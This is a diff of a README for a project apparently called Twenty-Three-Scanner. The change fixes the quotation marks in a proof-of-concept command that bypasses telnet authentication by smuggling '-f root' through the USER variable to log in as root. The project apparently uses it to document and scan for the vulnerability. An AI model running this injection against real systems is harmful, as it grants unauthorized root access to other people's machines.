madfxr/Twenty-Three-Scanner/README.md

 ### 🧪 Proof of Concept (PoC)

-And here is the Proof of Concept (PoC) for this vulnerability, which can be executed manually from the attacker's host simply by running the command `USER=“-f root” telnet -a <TARGET_HOST> 23`.
+And here is the Proof of Concept (PoC) for this vulnerability, which can be executed manually from the attacker's host simply by running the command `USER="-f root" telnet -a <TARGET_HOST> 23`.
 <p align="center">
   <img
     src="https://github.com/user-attachments/assets/2710b1b6-74cf-4f6a-87d3-981d7f1eaa6e"